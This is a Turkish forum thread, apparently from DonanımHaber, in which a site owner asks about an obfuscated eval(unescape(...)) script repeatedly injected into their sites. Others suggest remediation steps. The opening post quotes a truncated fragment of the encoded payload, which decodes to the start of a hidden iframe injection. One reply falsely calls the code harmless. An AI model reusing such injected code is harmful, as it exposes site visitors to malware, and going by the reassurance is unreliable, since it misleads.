bu script e rastlayan varmı?.... eval ( unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%6 böleeeeeeeeeeeeeeeeeeeee giden bi kod sitelerimize daldı arkadaşlar daha önce rastlayan varmı? bizden kimse site içeriği ile uğraşmıyor zaman ayarlı gibi gecenin köründe 4 te bazen sabahın 7 sinde index e giriyor kod u atıyor... sitenin arkaplanını yok ediyor arasıra siteyi sağ a uzatıyor bazen linkleri yok ediyor ... hosttan diyicem sadece uğraştığım sitelerde böle bi sorun mevcut diğer sitelerimizde sorun yok ozaman bilgisayarımdan kaynaklanıyor 3 tane antivirüs ile tarattım index.dat çıktı Ad - Aware_2007 de 32 tane diğerleri birşey bulamadı son zamanlardada siteye girdiğimizde .exe virüsü yakaladı antivir... formattan başka şansım yok gibi...
belki başka bi sorundur
DH forumlarında vakit geçirmekten keyif alıyor gibisin ancak giriş yapmadığını görüyoruz.
Üye olduğunda özel mesaj gönderebilir, beğendiğin konuları favorilerine ekleyip takibe alabilir ve daha önce gezdiğin konulara hızlıca erişebilirsin.
javascript ile yapılan kodların gizlenmesi için bişey. zararlı bir şey yok. sayfanın yapısının değişmesi mümkün çünkü css ve diğer bazı karakterlerde sorun yaşayabiliyor buda sitenin sağa sola kaymış arkaplanı değişmiş şekilde görünmesine sebeb oluyor.
bunun için host firmanla görüş.muhtemelen onların bir etkisi vardır derim
o virus buyuk ihtimal çokda yaygın server adminizle görüşün muhtemelen kullandığınız scriptlerde veya server da açık var. çok buyuk ihtimalde trojan yaymakta millete. formatda atsanız scriptlerde açık varsa gene girer.
Dostum öncelikle şunu belirteyim hosting ile alakalı şifrelerin sanıyorum hotmail.com hesabında... izleyecegin yolu kısaca özetleyeyim. ilk önce şifrelerini (domain ve hostingle ilgili tüm şifreler vs..)hotmail mynet gibi sunucularda barındırmamalısın.cpanelden kullanıcı ayarları kısmından mail adresini değiştir. ikinci adım ise index e yapışmış olan bu java script i yani bug u silip dosyalarını virüs taramasından geçirdikten sonra bir ftp programı yardımı ile upload etmelisin...
sitenizde eğer herhangibi biryerden text girişi yaptırıyorsanız birileri bunu sitenize java kodu vs olarak enjekte etmiş olabilir.
O da olabilir de bu host ile alakalı.Geçen de bulaştı 2.defa oldu bu ve yine aynı hosttaki siteye bulaştı.Bilgisayardan gelse diğer sitelere de gelirdi.Yani tamamen host ile alakalı düşünüyorum artık.
Kardeş bu script anamı ağlattı benim :D 5-6 tane siteme bulaştı hergün temizliyorum hergün bulaşıyordu. kesin çözümü buldum gibi aslında. Komple hostunu yedekle bilgisayarına sonra içindeki zararlı kodları temizle eval unspace ile başlayanlar genelde default dosyalarına atıyor.Bu arada resim felan yükleme yapıyorsan klasörlerinin içinede bak yükleme yapılan klasörlere 8-10 tane html dosyası da atıyor. hostu komple sil ve tekrardan oluştur. temizledigin dosyalarını yükle daha bişey olmaz. Ben bizzat bu sorunla karşılaştım bu şekilde yaptım bi daha da olmadı. Şimdiden kolay gelsin
bizden kimse site içeriği ile uğraşmıyor zaman ayarlı gibi gecenin köründe 4 te bazen sabahın 7 sinde index e giriyor kod u atıyor...
sitenin arkaplanını yok ediyor arasıra siteyi sağ a uzatıyor bazen linkleri yok ediyor ...
hosttan diyicem sadece uğraştığım sitelerde böle bi sorun mevcut diğer sitelerimizde sorun yok ozaman bilgisayarımdan kaynaklanıyor 3 tane antivirüs ile tarattım index.dat çıktı Ad - Aware_2007 de 32 tane diğerleri birşey bulamadı
son zamanlardada siteye girdiğimizde .exe virüsü yakaladı antivir...
formattan başka şansım yok gibi...
belki başka bi sorundur
DH forumlarında vakit geçirmekten keyif alıyor gibisin ancak giriş yapmadığını görüyoruz.
Üye Ol Şimdi DeğilÜye olduğunda özel mesaj gönderebilir, beğendiğin konuları favorilerine ekleyip takibe alabilir ve daha önce gezdiğin konulara hızlıca erişebilirsin.